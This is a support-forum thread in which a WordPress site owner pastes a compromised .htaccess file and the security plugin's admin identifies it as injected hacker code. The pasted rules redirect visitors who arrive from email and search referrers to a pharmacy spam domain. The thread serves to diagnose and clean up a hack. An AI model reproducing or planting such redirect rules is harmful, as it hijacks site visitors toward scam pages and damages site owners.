hacker redirect htaccess code

Home Forums BulletProof Security Free hacker redirect htaccess code

This topic contains 4 replies, has 2 voices, and was last updated by  Living In Puglia 4 years, 4 months ago.

Viewing 5 posts - 1 through 5 (of 5 total)
  • Author
    Posts
  • #12780

    Living In Puglia
    Participant

    I am very confused … when I look at Current Root htaccess file in the Bulletproof control panel all looks good … starts

    #   BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS
    # If you edit the BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS text above
    # you will see error messages on the BPS Security Status page
    # BPS is reading the version number in the htaccess file to validate checks
    # If you would like to change what is displayed above you
    # will need to edit the BPS /includes/functions.php file to match your changes
    # If you update your WordPress Permalinks the code between BEGIN WordPress and
    # END WordPress is replaced by WP htaccess code.
    # This removes all of the BPS security code and replaces it with just the default WP htaccess code
    # To restore this file use BPS Restore or activate BulletProof Mode for your Root folder again.
    
    # BEGIN WordPress
    # IMPORTANT!!! DO NOT DELETE!!! - B E G I N WordPress above or E N D WordPress - text in this file
    # They are reference points for WP, BPS and other plugins to write to this htaccess file.
    # IMPORTANT!!! DO NOT DELETE!!! - BPSQSE BPS QUERY STRING EXPLOITS - text
    # BPS needs to find the - BPSQSE - text string in this file to validate that your security filters exist
    
    # TURN OFF YOUR SERVER SIGNATURE
    ServerSignature Off
    
    ***************************************
    
    But when I look at the actual .htaccess file I have
    ErrorDocument 404 http://buyrxcheap24.com/
    
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*imap.* [OR]
    RewriteCond %{HTTP_REFERER} .*mail* [OR]
    RewriteCond %{HTTP_REFERER} .*inbox* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmx.* [OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*
    RewriteRule ^(.*)$ http://buyrxcheap24.com/ [R=301,L]
    
    *************************************

    I have tried recreating the htaccess files but get the same result! Totally Confused now

    #12786

    AITpro Admin
    Keymaster

    That htaccess code is not BPS code and is hacker redirect code added by something/someone else.  Your website is already compromised/hacked.  See this Forum Topic link below for what to do next and also the link for the WordPress.org thread post.

    Website already hacked before installing BPS/BPS Pro
    http://forum.ait-pro.com/forums/topic/website-is-already-hacked-will-bps-pro-automatically-fix-or-remove-the-hackers-files-and-code/

    Similar/same hacking method
    http://wordpress.org/support/topic/htaccess-hacked-redirects-to-russion-site?replies=30

    #12793

    Living In Puglia
    Participant

    Thank you. I’ve been working through the sites and pretty much got back to normal I think. I’m on a shared server with a number of different domains/web sites, some on Joomla and some on WordPress. It’s pretty much looking like the original hack came into one of the Joomla sites!

    #12803

    AITpro Admin
    Keymaster

    We just posted this step by step WordPress hack cleanup/repair Topic since we receive emails very frequently from folks wanting to know if BPS will automatically cleanup a hacked website.  This post/topic was on our “to-do” list so it is now “to-done”.  😉  I think the general idea of the cleanup/repair steps will also work in general for Joomla or other site types.  Obviously there are going to be technical/specific things that are not going to be the same between WordPress and Joomla, but the general approach is probably the best approach to take for website hack cleanup/repair.

    http://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

     

    #12836

    Living In Puglia
    Participant

    Thanks …. very helpful

     

Viewing 5 posts - 1 through 5 (of 5 total)

You must be logged in to reply to this topic.